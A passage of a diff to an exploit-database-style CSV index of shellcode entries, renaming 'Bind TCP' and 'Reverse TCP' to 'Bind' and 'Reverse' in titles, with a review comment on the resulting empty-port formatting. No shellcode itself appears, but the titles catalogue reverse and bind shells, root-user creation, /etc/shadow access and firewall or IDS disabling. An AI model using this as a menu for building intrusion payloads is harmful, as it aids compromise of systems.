 39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
+39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
 39914,shellcodes/windows_x86/39914.c,"Windows/x86 - system(systeminfo) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 39979,shellcodes/windows/39979.c,"Windows (XP < 10) - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
 40005,shellcodes/windows_x86/40005.c,"Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
-40029,shellcodes/linux_x86-64/40029.c,"Linux/x64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
-40052,shellcodes/linux_x86-64/40052.c,"Linux/x64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
-40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
-40061,shellcodes/linux_x86-64/40061.c,"Linux/x64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
-40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
-40079,shellcodes/linux_x86-64/40079.c,"Linux/x64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
-40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
-40122,shellcodes/linux_x86-64/40122.c,"Linux/x64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
-40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
+40029,shellcodes/linux_x86-64/40029.c,"Linux/x64 - Reverse (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
+40052,shellcodes/linux_x86-64/40052.c,"Linux/x64 - Bind (/TCP) Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
+40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
+40061,shellcodes/linux_x86-64/40061.c,"Linux/x64 - Bind (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
+40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
+40079,shellcodes/linux_x86-64/40079.c,"Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
+40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse (127.1.1.1:10/TCP) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
+40122,shellcodes/linux_x86-64/40122.c,"Linux/x64 - Bind (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
+40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
 40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
-40139,shellcodes/linux_x86-64/40139.c,"Linux/x64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
+40139,shellcodes/linux_x86-64/40139.c,"Linux/x64 - Reverse (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
 40175,shellcodes/windows_x86/40175.c,"Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
-40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86
-40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86
+40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
+40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind (9090/TCP) Shell
(/bin/zsh) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86 +40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86 40245,shellcodes/windows_x86/40245.c,"Windows/x86 - MessageBoxA() Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86 40246,shellcodes/windows_x86/40246.c,"Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86 40259,shellcodes/windows_x86/40259.c,"Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86 -43562,shellcodes/linux_x86-64/43562.c,"Linux/x64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 +43562,shellcodes/linux_x86-64/43562.c,"Linux/x64 - Bind (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 43563,shellcodes/linux_x86-64/43563.c,"Linux/x64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 43564,shellcodes/linux_x86-64/43564.c,"Linux/x64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 43565,shellcodes/linux_x86-64/43565.asm,"Linux/x64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64 -43566,shellcodes/linux_x86-64/43566.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 -43568,shellcodes/linux_x86-64/43568.asm,"Linux/x64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 
-43570,shellcodes/linux_x86-64/43570.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 -43597,shellcodes/linux_x86-64/43597.c,"Linux/x64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64 -43598,shellcodes/linux_x86-64/43598.c,"Linux/x64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 -43599,shellcodes/linux_x86-64/43599.c,"Linux/x64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 -43601,shellcodes/linux_x86-64/43601.asm,"Linux/x64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 -43602,shellcodes/linux_x86-64/43602.asm,"Linux/x64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 +43566,shellcodes/linux_x86-64/43566.asm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 +43568,shellcodes/linux_x86-64/43568.asm,"Linux/x64 - Reverse (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 +43570,shellcodes/linux_x86-64/43570.asm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 +43597,shellcodes/linux_x86-64/43597.c,"Linux/x64 - Bind (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. 
Bem",shellcode,linux_x86-64 +43598,shellcodes/linux_x86-64/43598.c,"Linux/x64 - Bind (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 +43599,shellcodes/linux_x86-64/43599.c,"Linux/x64 - Reverse (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 +43601,shellcodes/linux_x86-64/43601.asm,"Linux/x64 - Bind (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 +43602,shellcodes/linux_x86-64/43602.asm,"Linux/x64 - Reverse (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 43603,shellcodes/linux_x86-64/43603.c,"Linux/x64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 43604,shellcodes/linux_x86-64/43604.c,"Linux/x64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 43605,shellcodes/linux_x86-64/43605.c,"Linux/x64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 
@@ -612,23 +612,23 @@ id,file,description,date,author,type,platform
 43607,shellcodes/linux_x86-64/43607.c,"Linux/x64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64
 43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86
 43610,shellcodes/osx_ppc/43610.c,"OSX/PPC - Remote findsock by recv() Key Shellcode",2009-01-01,"Dino Dai Zovi",shellcode,osx_ppc
-43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
+43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse (/TCP) Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
 43612,shellcodes/osx_ppc/43612.asm,"OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
 43613,shellcodes/osx_ppc/43613.asm,"OSX/PPC - Stager Sock Find Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
 43614,shellcodes/osx_ppc/43614.asm,"OSX/PPC - Stager Sock Reverse Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
-43615,shellcodes/osx_ppc/43615.c,"OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes)",2009-01-01,"H D Moore",shellcode,osx_ppc
+43615,shellcodes/osx_ppc/43615.c,"OSX/PPC - Bind (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes)",2009-01-01,"H D Moore",shellcode,osx_ppc
 43616,shellcodes/osx_ppc/43616.asm,"OSX/PPC - execve(/bin/sh) + Null-Free Shellcode",2009-01-01,ghandi,shellcode,osx_ppc
 43617,shellcodes/osx_ppc/43617.c,"OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes)",2009-01-01,haphet,shellcode,osx_ppc
 43618,shellcodes/osx/43618.c,"OSX/x86 - execve(/bin/sh) Shellcode (24 bytes)",2009-01-01,haphet,shellcode,osx
 43626,shellcodes/linux_x86/43626.c,"Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes)",2009-01-01,vlad902,shellcode,linux_x86
 43627,shellcodes/bsd_x86/43627.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execute /bin/sh Shellcode (57 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
-43628,shellcodes/bsd_x86/43628.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind TCP (2222/TCP) Shell Shellcode (133 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
-43629,shellcodes/bsd_x86/43629.c,"BSD/x86 - Bind TCP (2222/TCP) Shell Shellcode (100 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43628,shellcodes/bsd_x86/43628.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind (2222/TCP) Shell Shellcode (133 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43629,shellcodes/bsd_x86/43629.c,"BSD/x86 - Bind (2222/TCP) Shell Shellcode (100 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
 43630,shellcodes/linux_x86/43630.c,"Linux/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (67 bytes)",2009-01-01,dev0id,shellcode,linux_x86
 43631,shellcodes/linux_x86/43631.c,"Linux/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)",2009-01-01,dev0id,shellcode,linux_x86
 43621,shellcodes/solaris_sparc/43621.c,"Solaris/SPARC - setreuid(geteuid()) + setregid(getegid()) + execve(/bin/sh) Shellcode",2009-01-01,"Claes M. Nyberg",shellcode,solaris_sparc
-43622,shellcodes/solaris_sparc/43622.asm,"Solaris/SPARC - Bind TCP (2001/TCP) Shell (/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,solaris_sparc
-43623,shellcodes/solaris_sparc/43623.asm,"Solaris/SPARC - Bind TCP Shell Shellcode",2009-01-01,vlad902,shellcode,solaris_sparc
+43622,shellcodes/solaris_sparc/43622.asm,"Solaris/SPARC - Bind (2001/TCP) Shell (/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,solaris_sparc
+43623,shellcodes/solaris_sparc/43623.asm,"Solaris/SPARC - Bind (/TCP) Shell Shellcode",2009-01-01,vlad902,shellcode,solaris_sparc
 43624,shellcodes/solaris_x86/43624.asm,"Solaris/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (61 bytes)",2009-01-01,"John Babio",shellcode,solaris_x86
 43625,shellcodes/solaris_x86/43625.c,"Solaris/x86 - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,shellcode.com.ar,shellcode,solaris_x86
 43632,shellcodes/bsd_x86/43632.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
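Review bot: The new titles for 43611 and 43623 in this hunk read `Reverse (/TCP) Shell` and `Bind (/TCP) Shell`, with nothing before the slash, because the old titles named no port. A consumer that splits the parenthesised endpoint as `port/proto` or `host:port/proto` (search tooling, or detection content keyed on these index titles) would get an empty port field rather than an absent one. Where the port is not fixed I would drop the slash, e.g. `OSX/PPC - Reverse (TCP) Shell (/bin/csh) Shellcode`. The same shape recurs at 43746 in the `-721,12` hunk, and the 43510 row further down additionally loses the space in `(/TCP)Shell`.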
@@ -644,7 +644,7 @@ id,file,description,date,author,type,platform
 43643,shellcodes/linux_x86/43643.c,"Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,linux_x86
 43644,shellcodes/bsd_x86/43644.asm,"BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
 43645,shellcodes/bsd_x86/43645.asm,"BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
-43646,shellcodes/linux_x86/43646.c,"Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)",2009-01-01,lamagra,shellcode,linux_x86
+43646,shellcodes/linux_x86/43646.c,"Linux/x86 - Bind (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)",2009-01-01,lamagra,shellcode,linux_x86
 43647,shellcodes/linux_x86/43647.c,"Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)",2009-01-01,Shok,shellcode,linux_x86
 43648,shellcodes/linux_x86/43648.c,"Linux/x86 - Disable Shadowing Shellcode (42 bytes)",2009-07-04,vlan7,shellcode,linux_x86
 43649,shellcodes/linux_x86/43649.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)",2009-07-04,vlan7,shellcode,linux_x86
@@ -654,7 +654,7 @@ id,file,description,date,author,type,platform
 43653,shellcodes/linux_x86/43653.c,"Linux/x86 - execve(/sbin/shutdown_/sbin/shutdown 0) Shellcode (36 bytes)",2009-07-11,TheWorm,shellcode,linux_x86
 43654,shellcodes/linux_x86/43654.c,"Linux/x86 - execve(/sbin/reboot_/sbin/reboot) Shellcode (28 bytes)",2009-07-11,TheWorm,shellcode,linux_x86
 43655,shellcodes/linux_x86/43655.c,"Linux/x86 - execve(/sbin/halt_/sbin/halt) Shellcode (27 bytes)",2009-07-11,TheWorm,shellcode,linux_x86
-43656,shellcodes/linux_x86/43656.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)",2009-01-01,storm,shellcode,linux_x86
+43656,shellcodes/linux_x86/43656.c,"Linux/x86 - Bind (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)",2009-01-01,storm,shellcode,linux_x86
 43657,shellcodes/linux_x86/43657.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__0_0) Shellcode (28 bytes)",2009-01-01,storm,shellcode,linux_x86
 43658,shellcodes/linux_x86/43658.c,"Linux/x86 - execve(/bin/sh_0_0) Shellcode (21 bytes)",2009-01-01,storm,shellcode,linux_x86
 43660,shellcodes/linux_x86/43660.c,"Linux/x86 - fork() + setreuid(0_ 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)",2009-01-01,anonymous,shellcode,linux_x86
@@ -669,8 +669,8 @@ id,file,description,date,author,type,platform
 43671,shellcodes/linux_x86/43671.c,"Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes)",2009-01-01,bob,shellcode,linux_x86
 43672,shellcodes/generator/43672.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)",2009-01-01,"Russell Sanford",shellcode,generator
 43673,shellcodes/linux_x86/43673.c,"Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)",2009-01-01,sacrine,shellcode,linux_x86
-43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86
-43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86
+43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86
+43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86
 43677,shellcodes/linux_x86/43677.c,"Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes)",2009-01-01,eSDee,shellcode,linux_x86
 43679,shellcodes/linux_x86/43679.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
 43680,shellcodes/linux_x86/43680.c,"Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
@@ -688,7 +688,7 @@ id,file,description,date,author,type,platform
 43695,shellcodes/linux_x86/43695.c,"Linux/x86 - Force unmount /media/disk Shellcode (33 bytes)",2010-06-04,gunslinger_,shellcode,linux_x86
 43696,shellcodes/linux_x86/43696.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes)",2009-01-01,agix,shellcode,linux_x86
 43697,shellcodes/linux_x86/43697.c,"Linux/x86 - CDRom Ejecting + Polymorphic Shellcode (74 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
-43698,shellcodes/linux_x86/43698.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
+43698,shellcodes/linux_x86/43698.c,"Linux/x86 - Bind (31337/TCP) Shell + Polymorphic Shellcode (125 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
 43699,shellcodes/linux_x86/43699.c,"Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
 43700,shellcodes/linux_x86/43700.c,"Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
 43702,shellcodes/linux_x86/43702.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)",2009-01-01,Kernel_Panik,shellcode,linux_x86
@@ -707,12 +707,12 @@ id,file,description,date,author,type,platform
 43722,shellcodes/linux_x86/43722.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
 43725,shellcodes/linux_x86/43725.c,"Linux/x86 - Force Reboot Shellcode (36 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
 43724,shellcodes/linux_x86/43724.c,"Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
-43726,shellcodes/linux_x86/43726.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43727,shellcodes/linux_x86/43727.c,"Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43728,shellcodes/linux_x86/43728.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43729,shellcodes/linux_x86/43729.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43730,shellcodes/linux_x86/43730.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43731,shellcodes/linux_x86/43731.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43726,shellcodes/linux_x86/43726.c,"Linux/x86 - Bind (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43727,shellcodes/linux_x86/43727.c,"Linux/x86 - Reverse (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43728,shellcodes/linux_x86/43728.c,"Linux/x86 - Bind (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43729,shellcodes/linux_x86/43729.c,"Linux/x86 - Bind (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43730,shellcodes/linux_x86/43730.c,"Linux/x86 - Bind (1111/TCP) Shell + Null-Free Shellcode (73 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43731,shellcodes/linux_x86/43731.c,"Linux/x86 - Bind (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43732,shellcodes/linux_x86/43732.c,"Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43735,shellcodes/linux_x86/43735.c,"Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43736,shellcodes/linux_x86/43736.c,"Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
@@ -721,12 +721,12 @@ id,file,description,date,author,type,platform
 43739,shellcodes/linux_x86/43739.c,"Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43740,shellcodes/linux_x86/43740.c,"Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43741,shellcodes/generator/43741.py,"Linux/x86 - Uzumaki Encryptor Shellcode (Generator)",2013-01-01,"Geyslan G. Bem",shellcode,generator
-43742,shellcodes/linux_x86/43742.c,"Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes)",2009-01-01,"Russell Willis",shellcode,linux_x86
+43742,shellcodes/linux_x86/43742.c,"Linux/x86 - Bind (31337/TCP) Shell Shellcode (108 bytes)",2009-01-01,"Russell Willis",shellcode,linux_x86
 43743,shellcodes/linux_x86/43743.c,"Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)",2009-01-01,"Hamid Zamani",shellcode,linux_x86
 43744,shellcodes/linux_x86/43744.c,"Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)",2013-05-28,"Russell Willis",shellcode,linux_x86
 43745,shellcodes/linux_x86/43745.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86
